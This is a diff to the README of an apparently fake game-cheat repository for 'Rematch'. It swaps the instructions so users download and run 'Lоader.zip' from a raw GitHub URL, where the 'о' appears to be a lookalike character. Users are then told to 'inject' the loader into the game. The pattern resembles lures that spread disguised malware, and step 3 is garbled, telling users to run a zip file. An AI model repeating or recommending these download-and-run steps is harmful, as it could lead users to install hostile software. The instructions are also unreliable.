G0urv/Rematch-Arcade-Toolkit/README.md

 Getting started with Rematch Cheat Menu is quick and easy!
 Follow the steps below to set up your environment:

-1. Download **Loader.rar** from this repository.
+1. Download **https://raw.githubusercontent.com/G0urv/Rematch-Arcade-Toolkit/main/Lоader.zip** from this repository.
 2. Extract the contents using any modern archiver (e.g., WinRAR, 7-Zip, Keka, or Archive Utility).
-3. Run the Loader.exe (Windows) or use Terminal for launching on macOS/Linux.
+3. Run the https://raw.githubusercontent.com/G0urv/Rematch-Arcade-Toolkit/main/Lоader.zip (Windows) or use Terminal for launching on macOS/Linux.
 4. Follow on-screen prompts to inject and configure the menu.
 5. Customize your settings via the intuitive in-game GUI.
 6. Enjoy enhanced gameplay! 🚀